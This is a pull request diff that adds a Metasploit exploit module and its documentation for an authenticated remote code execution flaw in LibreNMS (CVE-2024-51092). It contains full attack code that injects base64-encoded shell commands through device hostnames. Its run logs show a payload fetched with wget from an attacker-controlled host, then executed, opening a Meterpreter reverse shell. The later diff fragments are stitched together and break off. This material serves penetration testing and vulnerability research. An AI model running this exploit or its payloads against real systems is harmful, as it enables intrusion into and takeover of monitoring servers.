### PR TITLE
Add LibreNMS Authenticated RCE module (CVE-2024-51092)

### DIFF
--- a/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
+++ b/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
@@ -1,0 +1,120 @@
+## Vulnerable Application
+
+An authenticated attacker can create dangerous directory names on the system and
+alter sensitive configuration parameters through the web portal.
+Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
+thus achieving arbitrary code execution.
+
+The vulnerability affects:
+
+    * LibreNMS <= 24.9.1
+
+This module was successfully tested on:
+
+    * LibreNMS 24.9.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
+After git clone, change version: `git checkout tags/24.9.1`.
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
+5. (Optional) Do: `php artisan device:poll all` on the victim machine or wait up to 5 minutes (default cron setting)
+6. You should get a meterpreter
+
+
+## Options
+### USERNAME (required)
+User name for LibreNMS.
+
+### PASSWORD (required)
+Password for LibreNMS.
+
+### PATH (required)
+LibreNMS installed location. Default is `/opt/librenms`.
+
+### WAIT (required)
+Wait time (seconds) for cron to poll the device. Default is `30`.
+
+### RETRY (required)
+Maximum wait time: WAIT x RETRY (seconds). Default is `11`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > options
+
+Module options (exploit/linux/http/librenms_authenticated_rce_cve_2024_51092):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   yes       Password for LibreNMS
+   PATH      /opt/librenms    yes       LibreNMS installed location
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RETRY     11               yes       Maximum wait time: WAIT x RETRY (seconds)
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       User name for LibreNMS
+   VHOST                      no        HTTP server virtual host
+   WAIT      30               yes       Wait time (seconds) for cron to poll the device
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      bndYRWQBrjK      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. LibreNMS detected.
+[*] Successfully logged into LibreNMS. Storing credentials...
+[*] [1/11] Waiting 30 seconds for cron to poll the device...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:41764) at 2025-01-12 12:20:32 +0900
+[*] Reset snmpget to default.
+[*] Deleted device: 120
+[*] Deleted device: 121
+[*] Deleted device: 122
+[*] Deleted device: 123
+
+meterpreter > getuid
+Server username: librenms
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-50-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
+++ b/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
@@ -19,6 +19,10 @@ This module was successfully tested on:
 1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
 After git clone, change version: `git checkout tags/24.9.1`.
 
+2. Comment out the last line in `/etc/cron.d/librenms`:
+`19 0 * * * librenms /opt/librenms/daily.sh >> /dev/null 2>&1`.
+Otherwise, the version will be updated to the latest, causing the exploit to fail.
+
 
 ## Verification Steps
 
@@ -75,7 +79,7 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      bndYRWQBrjK      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      UGYxnLuWa        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -99,14 +103,24 @@ msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=1
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. LibreNMS detected.
 [*] Successfully logged into LibreNMS. Storing credentials...
+[*] Added host: 'VJl;echo d2dldCAtcU8gLi9YV0xDWVVlVFcgaHR0cDovLzE5Mi4xNjguNTYuMTo4MDgwL0ctOGY4bmtvSDBkVFpHUHNOdlMyM2c=|base64 -d|bash;#'
+[*] Actual payload: wget -qO ./XWLCYUeTW http://192.168.56.1:8080/G-8f8nkoH0dTZGPsNvS23g
+[*] Added host: 'siF;echo Y2htb2QgK3ggLi9YV0xDWVVlVFc=|base64 -d|bash;#'
+[*] Actual payload: chmod +x ./XWLCYUeTW
+[*] Added host: 'Dd0;echo Li9YV0xDWVVlVFcmc2xlZXAgMw==|base64 -d|bash;#'
+[*] Actual payload: ./XWLCYUeTW&sleep 3
+[*] Added host: 'vPR;echo cm0gLXJmIC4vWFdMQ1lVZVRX|base64 -d|bash;#'
+[*] Actual payload: rm -rf ./XWLCYUeTW
 [*] [1/11] Waiting 30 seconds for cron to poll the device...
+[*] [2/11] Waiting 30 seconds for cron to poll the device...
+[*] [3/11] Waiting 30 seconds for cron to poll the device...
 [*] Sending stage (3045380 bytes) to 192.168.56.17
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:41764) at 2025-01-12 12:20:32 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:45034) at 2025-01-13 10:42:03 +0900
 [*] Reset snmpget to default.
-[*] Deleted device: 120
-[*] Deleted device: 121
-[*] Deleted device: 122
-[*] Deleted device: 123
+[*] Deleted device: 226
+[*] Deleted device: 227
+[*] Deleted device: 228
+[*] Deleted device: 229
 
 meterpreter > getuid
 Server username: librenms

--- a/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
+++ b/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
@@ -7,10 +7,11 @@ thus achieving arbitrary code execution.
 
 The vulnerability affects:
 
-    * LibreNMS <= 24.9.1
+    * 24.9.0 <= LibreNMS <= 24.9.1
 
 This module was successfully tested on:
 
+    * LibreNMS 24.9.0 installed on Ubuntu 22.04
     * LibreNMS 24.9.1 installed on Ubuntu 22.04
 
 

--- a/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
+++ b/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
@@ -79,7 +79,7 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      UGYxnLuWa        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      TeYGiCPdGgd      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -101,26 +101,25 @@ View the full module info with the info, or info -d command.
 msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[!] The service is running, but could not be validated. LibreNMS detected.
-[*] Successfully logged into LibreNMS. Storing credentials...
-[*] Added host: 'VJl;echo d2dldCAtcU8gLi9YV0xDWVVlVFcgaHR0cDovLzE5Mi4xNjguNTYuMTo4MDgwL0ctOGY4bmtvSDBkVFpHUHNOdlMyM2c=|base64 -d|bash;#'
-[*] Actual payload: wget -qO ./XWLCYUeTW http://192.168.56.1:8080/G-8f8nkoH0dTZGPsNvS23g
-[*] Added host: 'siF;echo Y2htb2QgK3ggLi9YV0xDWVVlVFc=|base64 -d|bash;#'
-[*] Actual payload: chmod +x ./XWLCYUeTW
-[*] Added host: 'Dd0;echo Li9YV0xDWVVlVFcmc2xlZXAgMw==|base64 -d|bash;#'
-[*] Actual payload: ./XWLCYUeTW&sleep 3
-[*] Added host: 'vPR;echo cm0gLXJmIC4vWFdMQ1lVZVRX|base64 -d|bash;#'
-[*] Actual payload: rm -rf ./XWLCYUeTW
+[*] Successfully logged into LibreNMS.
+[+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
+[*] Added host: 'nLC;echo d2dldCAtcU8gLi9pa2Z1TW5QdVVHIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9HLThmOG5rb0gwZFRaR1BzTnZTMjNn|base64 -d|bash;#'
+[*] Actual payload: wget -qO ./ikfuMnPuUG http://192.168.56.1:8080/G-8f8nkoH0dTZGPsNvS23g
+[*] Added host: 'oUV;echo Y2htb2QgK3ggLi9pa2Z1TW5QdVVH|base64 -d|bash;#'
+[*] Actual payload: chmod +x ./ikfuMnPuUG
+[*] Added host: 'GVZ;echo Li9pa2Z1TW5QdVVHJnNsZWVwIDU=|base64 -d|bash;#'
+[*] Actual payload: ./ikfuMnPuUG&sleep 5
+[*] Added host: 'OYV;echo cm0gLXJmIC4vaWtmdU1uUHVVRw==|base64 -d|bash;#'
+[*] Actual payload: rm -rf ./ikfuMnPuUG
 [*] [1/11] Waiting 30 seconds for cron to poll the device...
 [*] [2/11] Waiting 30 seconds for cron to poll the device...
-[*] [3/11] Waiting 30 seconds for cron to poll the device...
 [*] Sending stage (3045380 bytes) to 192.168.56.17
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:45034) at 2025-01-13 10:42:03 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:54048) at 2025-01-16 12:57:18 +0900
 [*] Reset snmpget to default.
-[*] Deleted device: 226
-[*] Deleted device: 227
-[*] Deleted device: 228
-[*] Deleted device: 229
+[*] Deleted device: 291
+[*] Deleted device: 292
+[*] Deleted device: 293
+[*] Deleted device: 294
 
 meterpreter > getuid
 Server username: librenms

--- a/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
+++ b/documentation/modules/exploit/linux/http/librenms_authenticated_rce_cve_2024_51092.md
@@ -45,10 +45,7 @@ Password for LibreNMS.
 LibreNMS installed location. Default is `/opt/librenms`.
 
 ### WAIT (required)
-Wait time (seconds) for cron to poll the device. Default is `30`.
-
-### RETRY (required)
-Maximum wait time: WAIT x RETRY (seconds). Default is `11`.
+Wait time (seconds) for cron to poll the device. Default is `315`.
 
 
 ## Scenarios
@@ -64,13 +61,12 @@ Module options (exploit/linux/http/librenms_authenticated_rce_cve_2024_51092):
    PASSWORD                   yes       Password for LibreNMS
    PATH      /opt/librenms    yes       LibreNMS installed location
    Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RETRY     11               yes       Maximum wait time: WAIT x RETRY (seconds)
    RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT     80               yes       The target port (TCP)
    SSL       false            no        Negotiate SSL/TLS for outgoing connections
    USERNAME                   yes       User name for LibreNMS
    VHOST                      no        HTTP server virtual host
-   WAIT      30               yes       Wait time (seconds) for cron to poll the device
+   WAIT      315              yes       Wait time (seconds) for cron to poll the device
 
 
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
@@ -78,11 +74,11 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      TeYGiCPdGgd      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      n                no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_URIPATH       s                no        Local URI to use for serving payload
    FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
    LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
    LPORT               4444             yes       The listen port
@@ -103,23 +99,15 @@ msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=1
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Successfully logged into LibreNMS.
 [+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
-[*] Added host: 'nLC;echo d2dldCAtcU8gLi9pa2Z1TW5QdVVHIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9HLThmOG5rb0gwZFRaR1BzTnZTMjNn|base64 -d|bash;#'
-[*] Actual payload: wget -qO ./ikfuMnPuUG http://192.168.56.1:8080/G-8f8nkoH0dTZGPsNvS23g
-[*] Added host: 'oUV;echo Y2htb2QgK3ggLi9pa2Z1TW5QdVVH|base64 -d|bash;#'
-[*] Actual payload: chmod +x ./ikfuMnPuUG
-[*] Added host: 'GVZ;echo Li9pa2Z1TW5QdVVHJnNsZWVwIDU=|base64 -d|bash;#'
-[*] Actual payload: ./ikfuMnPuUG&sleep 5
-[*] Added host: 'OYV;echo cm0gLXJmIC4vaWtmdU1uUHVVRw==|base64 -d|bash;#'
-[*] Actual payload: rm -rf ./ikfuMnPuUG
-[*] [1/11] Waiting 30 seconds for cron to poll the device...
-[*] [2/11] Waiting 30 seconds for cron to poll the device...
+[*] Try to add host: 'f;echo d2dldCAtcU8gLi9uIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9zO2NobW9kICt4IC4vbjsuL24m|base64 -d|bash;#', length: 100
+[*] Added host.
+[*] Actual payload: wget -qO ./n http://192.168.56.1:8080/s;chmod +x ./n;./n&
+[*] Waiting up to 315 seconds for cron to poll the device...
 [*] Sending stage (3045380 bytes) to 192.168.56.17
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:54048) at 2025-01-16 12:57:18 +0900
+[+] Deleted n
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:40228) at 2025-01-17 21:19:20 +0900
 [*] Reset snmpget to default.
-[*] Deleted device: 291
-[*] Deleted device: 292
-[*] Deleted device: 293
-[*] Deleted device: 294
+[*] Deleted device: 353
 
 meterpreter > getuid
 Server username: librenms

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -1,0 +1,261 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LibreNMS Authenticated RCE (CVE-2024-51092)',
+        'Description' => %q{
+          Authenticated RCE in LibreNMS
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'murrant (Tony Murray)', # PoC
+          'Takahiro Yokoyama'      # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/advisories/GHSA-x645-6pf9-xwxw'],
+          [ 'CVE', '2024-51092']
+        ],
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+        OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]),
+        OptString.new('PATH', [ true, 'LibreNMS installed location', '/opt/librenms' ]),
+        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 30 ]),
+        OptInt.new('RETRY', [ true, 'Maximum wait time: WAIT x RETRY (seconds)', 11 ]),
+      ]
+    )
+  end
+
+  def get_csrf_token(res)
+    return unless res.get_html_document.at('meta[name="csrf-token"]')
+
+    res.get_html_document.at('meta[name="csrf-token"]')['content']
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
+
+    token = get_csrf_token(res)
+    return Exploit::CheckCode::Unknown unless token
+
+    Exploit::CheckCode::Detected('LibreNMS detected.')
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    })
+    fail_with(Failure::Unknown, 'Failed to access the login page.') unless res&.code == 200
+
+    cookies = res.get_cookies
+    login_res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'cookie' => cookies,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        '_token' => get_csrf_token(res)
+      }
+    })
+    fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless login_res&.code == 302
+
+    @cookies = login_res.get_cookies
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'cookie' => @cookies
+    })
+    fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless res&.code == 200 && res.body.include?('Devices')
+
+    print_status('Successfully logged into LibreNMS. Storing credentials...')
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+  end
+
+  def exploit
+    login
+    add_host
+
+    [1, datastore['RETRY']].max.times do |i|
+      print_status("[#{i + 1}/#{datastore['RETRY']}] Waiting #{datastore['WAIT']} seconds for cron to poll the device...")
+      sleep datastore['WAIT']
+      break if @hosts.all? { |h| change_snmpget(h) }
+    end
+
+    @hosts.each do |host|
+      res = change_snmpget(host)
+      fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'about'),
+        'cookie' => @cookies
+      })
+    end
+  end
+
+  def add_host
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'addhost'),
+      'cookie' => @cookies
+    })
+    fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
+    @hosts = []
+    @device_ids = []
+    # The maximum host length is 128 characters, so the payload must be split.
+    payload.encoded.split(';').each do |pl|
+      host = "#{rand_text_alphanumeric(3, '/')};echo #{Rex::Text.encode_base64(pl)}|base64 -d|bash;#"
+      fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless host.length <= 128
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'addhost'),
+        'cookie' => @cookies,
+        'vars_post' => {
+          '_token' => get_csrf_token(res),
+          'hostname' => host,
+          'snmp' => 'on',
+          'sysName' => '',
+          'hardware' => '',
+          'os' => '',
+          'os_id' => '',
+          'snmpver' => 'v2c',
+          'port' => '',
+          'transport' => 'udp',
+          'port_assoc_mode' => 'ifIndex',
+          'community' => '',
+          'authlevel' => 'noAuthNoPriv',
+          'authname' => '',
+          'authpass' => '',
+          'authalgo' => 'SHA',
+          'cryptopass' => '',
+          'cryptoalgo' => 'AES',
+          'force_add' => 'on',
+          'Submit' => ''
+        }
+      })
+      fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200
+      @hosts << host
+      link = res.get_html_document.at("div.alert.alert-success:contains('Device added') a")
+      device_link = link['href'] if link
+      device_id = device_link.match(%r{/device/(\d+)})[1] if device_link&.match(%r{/device/(\d+)})
+      @device_ids << device_id if device_id
+    end
+  end
+
+  def change_snmpget(host)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries'),
+      'keep_cookies' => true,
+      'cookie' => @cookies
+    })
+    return unless res&.code == 200
+
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'headers' => {
+        'X-CSRF-TOKEN' => get_csrf_token(res)
+      },
+      'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
+      'cookie' => res.get_cookies,
+      'ctype' => 'application/json',
+      'data' => {
+        'value' => "file://#{datastore['PATH']}/rrd/#{host}/../../../../../bin/ls"
+      }.to_json
+    })
+    res&.code == 200
+  end
+
+  def cleanup
+    super
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'settings/external/binaries'),
+      'keep_cookies' => true,
+      'cookie' => @cookies
+    })
+
+    if res&.code == 200
+      res = send_request_cgi({
+        'method' => 'DELETE',
+        'headers' => {
+          'X-CSRF-TOKEN' => get_csrf_token(res)
+        },
+        'uri' => normalize_uri(target_uri.path, 'settings/snmpget'),
+        'cookie' => @cookies
+      })
+    end
+    print_status('Failed to reset snmpget to default.') unless res&.code == 200
+    print_status('Reset snmpget to default.') if res&.code == 200
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'delhost'),
+      'cookie' => @cookies
+    })
+    token = get_csrf_token(res)
+
+    if res&.code == 200
+      @device_ids.each do |device_id|
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'delhost'),
+          'cookie' => @cookies,
+          'vars_post' => {
+            '_token' => token,
+            'id' => device_id,
+            'confirm' => '1'
+          }
+        })
+        print_status("Failed to delete device: #{device_id}") unless res&.code == 200
+        print_status("Deleted device: #{device_id}") if res&.code == 200
+      end
+    else
+      print_status("Failed to delete devices: #{@device_ids&.join(',')}")
+    end
+  end
+
+end

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -89,15 +89,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'about')
     })
-    return Exploit::CheckCode::Detected('LibreNMS detected. Version is unknown.') unless res&.code == 200
+    return Exploit::CheckCode::Unknown('LibreNMS detected. Cannot find libreNMS version.') unless res&.code == 200
 
     html_body = res&.get_html_document
     version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
-    return Exploit::CheckCode::Unknown('Cannot find librenmsversion') if version_node.nil?
+    return Exploit::CheckCode::Unknown('LibreNMS detected. Cannot find libreNMS version.') if version_node.nil?
 
     version_node&.at('span')&.content = ''
     version = Rex::Version.new(version_node.text)
-    return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('24.9.1')
+    return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('24.9.0'), Rex::Version.new('24.9.1'))
 
     Exploit::CheckCode::Appears("LibreNMS version #{version} detected, which is vulnerable.")
   end

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -15,7 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'LibreNMS Authenticated RCE (CVE-2024-51092)',
         'Description' => %q{
-          Authenticated RCE in LibreNMS
+          An authenticated attacker can create dangerous directory names on the system and
+          alter sensitive configuration parameters through the web portal.
+          Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
+          thus achieving arbitrary code execution.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -73,10 +76,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'login'),
       'keep_cookies' => true
     })
-    return Exploit::CheckCode::Unknown unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
+    return Exploit::CheckCode::Unknown('LibreNMS is not detected.') unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
 
     token = get_csrf_token(res)
-    return Exploit::CheckCode::Unknown unless token
+    return Exploit::CheckCode::Unknown('Failed to extract csrf token.') unless token
 
     Exploit::CheckCode::Detected('LibreNMS detected.')
   end
@@ -176,6 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       })
       fail_with(Failure::Unknown, 'Failed to add device.') unless res&.code == 200
+      print_status("Added host: '#{host}'")
       @hosts << host
       link = res.get_html_document.at("div.alert.alert-success:contains('Device added') a")
       device_link = link['href'] if link

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
     # The maximum host length is 128 characters.
-    @host = "#{rand_text_alphanumeric(1, '/')};echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|bash;#"
+    @host = ";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;#"
     print_status("Try to add host: '#{@host}', length: #{@host.length}")
     fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless @host.length <= 128
     res = send_request_cgi({

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -163,11 +163,30 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
     # The maximum host length is 128 characters.
+# because 128 - 20 = 108 where 20 is length of remaining characters in original payload 
+if Rex::Text.encode_base64(payload.encoded).length <= 108
     @hosts = [";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"]
-    print_status("Try to add host: '#{@hosts[0]}', length: #{@hosts[0].length}")
-    unless @hosts[0].length <= 128
-      print_status('Failed to limit the host length to 128 characters or less. Stage the command to a file.')
-      @hosts = []
+    print_status("Adding host: '#{@hosts[0]}', length: #{@hosts[0].length}")
+else
+     staging_file = Rex::Text.rand_text_alpha(1, datastore['FETCH_FILENAME'])
+           register_file_for_cleanup(staging_file)
+      cmd = Rex::Text.encode_base64(payload.encoded)
+      # ;echo -n chunked_cmd>>staging_file;
+      # ;echo -n (space) = 9, >> = 2, ; = 1
+      max_chunk_size = 128 - (9 + 2 + staging_file.length + 1)
+      chunk_size = rand([1, max_chunk_size - 10].max..[1, max_chunk_size - 5].max)
+      print_status("Command chunk size = #{chunk_size}")
+      cmd_chunks = cmd.chars.each_slice(chunk_size).map(&:join)
+      redirector = '>'
+      cmd_chunks.each_with_index do |chunk, index|
+        print_status("Staging chunk #{index + 1} of #{cmd_chunks.count}")
+        @hosts << ";echo -n #{chunk}#{redirector}#{staging_file};"
+        redirector = '>>'
+      end
+      @hosts << ";cat #{staging_file} | base64 -d |sh;"
+end
+
+
       # cannot contain `/`
       staging_file = Rex::Text.rand_text_alpha(1, datastore['FETCH_FILENAME'])
       register_file_for_cleanup(staging_file)

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -274,7 +274,7 @@ class MetasploitModule < Msf::Exploit::Remote
